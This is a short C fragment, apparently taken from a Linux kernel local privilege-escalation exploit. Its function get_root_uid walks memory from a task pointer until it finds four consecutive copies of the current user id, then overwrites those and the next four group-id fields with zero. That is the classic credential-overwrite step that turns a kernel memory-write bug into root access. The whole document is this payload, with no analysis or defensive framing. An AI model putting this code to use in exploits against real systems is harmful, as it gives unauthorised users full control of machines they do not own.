
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 unsigned int uid ;

void get_root_uid(unsigned *task)
{
 unsigned *addr=task;
 while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
  addr++;
 }
 addr[0]=addr[1]=addr[2]=addr[3]=0;
 addr[4]=addr[5]=addr[6]=addr[7]=0;
 return;
}
